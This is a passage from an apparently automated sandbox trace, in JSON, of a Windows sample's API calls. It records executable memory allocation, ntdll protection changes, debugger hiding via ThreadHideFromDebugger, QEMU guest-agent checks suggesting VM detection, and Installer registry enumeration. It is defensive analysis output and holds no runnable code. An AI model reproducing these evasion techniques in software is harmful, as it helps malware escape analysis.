"thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 763 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 764 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 765 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 766 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 767 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 768 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 769 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 770 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 771 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 772 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 773 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 774 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 775 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 776 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 777 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 778 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 779 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 780 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 781 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 0, "id": 782 }, { "timestamp": "2025-02-27 23:34:17,191", "thread_id": "3892", "caller": "0x0040448a", "parentcaller": "0x0041224a", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02410000" }, { "name": "RegionSize", "value": "0x00012000" }, { "name": "Protection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 783 }, { "timestamp": "2025-02-27 23:34:17,316", "thread_id": "3892", "caller": "0x02419d48", "parentcaller": "0x0041224a", "category": "system", "api": "GetSystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 784 }, { "timestamp": "2025-02-27 23:34:17,972", "thread_id": "3892", "caller": "0x0041224a", "parentcaller": "0x004032a0", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 785 }, { "timestamp": "2025-02-27 23:34:17,987", "thread_id": "3892", "caller": "0x0241c3da", "parentcaller": "0x0041224a", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77151000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00120000" }, { "name": "MemoryType", "value": "0x01000000" }, { "name": "NewAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 786 }, { "timestamp": "2025-02-27 23:34:18,003", "thread_id": "3892", "caller": "0x0241c3da", "parentcaller": "0x0041224a", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77151000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00120000" }, { "name": "MemoryType", "value": "0x01000000" }, { "name": "NewAccessProtection", "value": "0x00000020", "pretty_value": "PAGE_EXECUTE_READ" }, { "name": "OldAccessProtection", "value": "0x00000020", "pretty_value": "PAGE_EXECUTE_READ" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 787 }, { "timestamp": "2025-02-27 23:34:18,003", "thread_id": "3892", "caller": "0x02410e79", "parentcaller": "0x0041224a", "category": "threading", "api": "NtSetInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "17", "pretty_value": "ThreadHideFromDebugger" }, { "name": "ThreadId", "value": "3892" } ], "repeated": 0, "id": 788 }, { "timestamp": "2025-02-27 23:34:18,003", "thread_id": "3892", "caller": "0x0241628f", "parentcaller": "0x0041224a", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc000003a", "pretty_return": "OBJECT_PATH_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Program Files\\Qemu-ga\\qemu-ga.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 789 }, { "timestamp": "2025-02-27 23:34:18,003", "thread_id": "3892", "caller": "0x0241628f", "parentcaller": "0x0041224a", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc000003a", "pretty_return": "OBJECT_PATH_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Program Files\\qga\\qga.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 790 }, { "timestamp": "2025-02-27 23:34:18,003", "thread_id": "3892", "caller": "0x02410f81", "parentcaller": "0x0041224a", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10410000" }, { "name": "RegionSize", "value": "0x1b102000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 791 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02419d48", "parentcaller": "0x0041224a", "category": "__notification__", "api": "sysenter", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadIdentifier", "value": "3892" }, { "name": "Module", "value": "KERNEL32.DLL" }, { "name": "Return Address", "value": "0x7588274c" } ], "repeated": 0, "id": 792 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02419d48", "parentcaller": "0x0041224a", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\SHELL32" }, { "name": "DllBase", "value": "0x75c40000" } ], "repeated": 0, "id": 793 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02419d48", "parentcaller": "0x0041224a", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\Msi" }, { "name": "DllBase", "value": "0x72b20000" } ], "repeated": 0, "id": 794 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02419d48", "parentcaller": "0x0041224a", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "Msi.dll" }, { "name": "BaseAddress", "value": "0x72b20000" } ], "repeated": 1, "id": 795 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x0000037c" } ], "repeated": 0, "id": 796 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xac\\xb0\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\x04\\xa04s\\xbc\\xb3\\x18\\x00\\x90cKs\\x1d2\\x92>\\xfe\\xff\\xff\\xff4\\xb1\\x18\\x00\\xe6\\xb57s3\\x00\\x00\\x00\\xbc\\x9aUs\\xdc\\xb5Us\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 797 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037c" } ], "repeated": 0, "id": 798 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "misc", "api": "GetSystemInfo", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 799 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtQueryLicenseValue", "status": true, "return": "0x00000000", "arguments": [ { "name": "Name", "value": "TerminalServices-RemoteConnectionManager-AllowAppServerMode" }, { "name": "Type", "value": "0x00000004" } ], "repeated": 0, "id": 800 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 801 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetNativeSystemInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882150" } ], "repeated": 0, "id": 802 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\Windows\\Installer" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\Installer" } ], "repeated": 1, "id": 803 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000037c" } ], "repeated": 0, "id": 804 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xbc\\xd5\\x19w" } ], "repeated": 0, "id": 805 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037c" } ], "repeated": 0, "id": 806 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 807 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000037c" } ], "repeated": 0, "id": 808 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\xe0\\xae\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 809 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037c" } ], "repeated": 0, "id": 810 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 811 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "2CD228B8B2E4A1742BC626947A22DD9B" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\2CD228B8B2E4A1742BC626947A22DD9B" } ], "repeated": 0, "id": 812 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 813 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x9a\\x85\\x02" } ], "repeated": 0, "id": 814 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 815 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 816 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 817 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 818 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 819 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 820 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\2CD228B8B2E4A1742BC626947A22DD9B" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\2CD228B8B2E4A1742BC626947A22DD9B" } ], "repeated": 0, "id": 821 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 822 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 823 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 824 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\2CD228B8B2E4A1742BC626947A22DD9B" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\2CD228B8B2E4A1742BC626947A22DD9B" } ], "repeated": 0, "id": 825 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 826 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 827 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": 